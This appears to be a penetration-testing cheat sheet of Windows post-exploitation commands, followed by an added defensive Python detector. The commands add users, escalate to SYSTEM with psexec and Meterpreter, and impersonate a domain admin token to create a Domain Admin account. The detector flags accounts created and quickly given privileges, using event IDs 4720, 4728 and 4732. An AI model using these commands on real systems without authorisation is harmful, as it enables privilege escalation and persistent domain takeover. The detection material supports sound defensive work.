Title: Simple Windows Commands used in Penetration Testing
Author: ajayverma
Check Who You Are

echo %USERDOMAIN%\%USERNAME%
whoami
Check Windows Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Add a User

net user <username> <password> /add

Add a User to the Administrators Group

net localgroup administrators <username> /add
Getting from Administrator to System

psexec -s cmd.exe
Getting system with Meterpreter

getsystem
(from the meterpreter shell)

Changing a User's Password

net user <username> <password>
View Domain Groups

net group /domain
View Members of Domain Group

net group /domain "<Group Name>"
Add Member with Domain Admin
This attack is on the assumption you have obtained a meterpreter shell on a system and you’re lucky enough to have found a domain admin’s token.

impersonate_token <Domain>\\<Username> # The Domain Admin's Username
add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker defined Username
add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>
You should now have an account on the Domain Controller with Domain Admin privileges.
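From the defender's side, the sequence above leaves a telltale pair of Security-log events on the domain controller: 4720 (a user account was created) followed shortly by 4728 (member added to a security-enabled global group such as Domain Admins); the `net localgroup administrators` step earlier on the page produces 4732 instead. The Python below is an added example, not part of the original post: it correlates constructed, already-normalised event records and flags any account that is created and made privileged within a short window (the field names and sample records are assumptions; real 4728 events carry the member as a DN/SID that must be resolved first).

```python
from datetime import datetime, timedelta

# Windows Security event IDs involved in the sequence described above
ACCOUNT_CREATED = 4720        # A user account was created
ADDED_TO_GLOBAL_GROUP = 4728  # Member added to a security-enabled global group (Domain Admins)
ADDED_TO_LOCAL_GROUP = 4732   # Member added to a security-enabled local group (Administrators)
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators"}

# Constructed sample records; fields are assumed to be pre-extracted from the event XML.
SAMPLE_EVENTS = [
    {"time": "2019-05-30 08:00:00", "id": 4720, "target": "svc_backup", "subject": "CORP\\jdoe"},
    {"time": "2019-05-30 12:40:02", "id": 4720, "target": "helpdesk7", "subject": "CORP\\jdoe"},
    {"time": "2019-05-30 12:41:15", "id": 4728, "member": "helpdesk7", "group": "Helpdesk", "subject": "CORP\\jdoe"},
    {"time": "2019-05-30 12:51:17", "id": 4720, "target": "tmpadmin", "subject": "CORP\\dadmin"},
    {"time": "2019-05-30 12:51:40", "id": 4728, "member": "tmpadmin", "group": "Domain Admins", "subject": "CORP\\dadmin"},
    {"time": "2019-05-30 12:55:00", "id": 4732, "member": "svc_backup", "group": "Administrators", "subject": "CORP\\jdoe"},
]


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def find_rapid_privilege_grants(events, window=timedelta(minutes=10)):
    """Return (account, group, seconds_between) for every account that is
    created (4720) and then added to a privileged group (4728/4732) within `window`."""
    created = {}  # lower-cased account name -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: parse_time(e["time"])):
        t = parse_time(ev["time"])
        if ev["id"] == ACCOUNT_CREATED:
            created[ev["target"].lower()] = t
        elif ev["id"] in (ADDED_TO_GLOBAL_GROUP, ADDED_TO_LOCAL_GROUP):
            acct, group = ev["member"].lower(), ev["group"]
            if group.lower() in PRIVILEGED_GROUPS and acct in created:
                delta = t - created[acct]
                if delta <= window:  # creation and privilege grant almost back to back
                    hits.append((acct, group, int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for acct, group, secs in find_rapid_privilege_grants(SAMPLE_EVENTS):
        print(f"ALERT: {acct} created and added to '{group}' {secs}s later")
```

Only `tmpadmin` is reported: `helpdesk7` joined a non-privileged group, and `svc_backup` was made a local Administrator hours after creation, outside the window.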


Submitted On: 2019-05-30 12:51:17